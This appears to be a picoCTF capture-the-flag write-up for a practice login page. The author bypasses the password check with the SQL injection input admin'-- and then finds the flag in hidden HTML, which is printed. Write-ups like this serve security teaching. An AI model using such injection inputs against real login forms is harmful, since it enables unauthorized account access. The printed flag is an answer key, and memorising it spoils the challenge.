Web Exploitation - SQLiLite - writeup

description

Can you login to this website?

Try to login here.

writeup

Once i visit the website http://saturn.picoctf.net:60431/ in firefox I can see a login form with a username and a password field.

My first attempt was to use the username ‘admin’ and try a basic sql injection.

So I input in the username field this:

1

admin'--

the single quote is here to end the input of the text box.

The double dash (–) is here to comment out the rest of the sql query so we can skip the password check.

Once I try to login using this method I get redirected to a page with the following content:

1
2
3
4
5

username: admin'--
password: 
SQL query: SELECT * FROM users WHERE name='admin'--' AND password=''

Logged in! But can you see the flag, it is in plainsight.

But looking at the html code reveals the flag pretty quickly:

1

<p hidden="">Your flag is: picoCTF{L00k5_l1k3_y0u_solv3d_it_8dac17f1}</p>

So the flag is

1

picoCTF{L00k5_l1k3_y0u_solv3d_it_8dac17f1}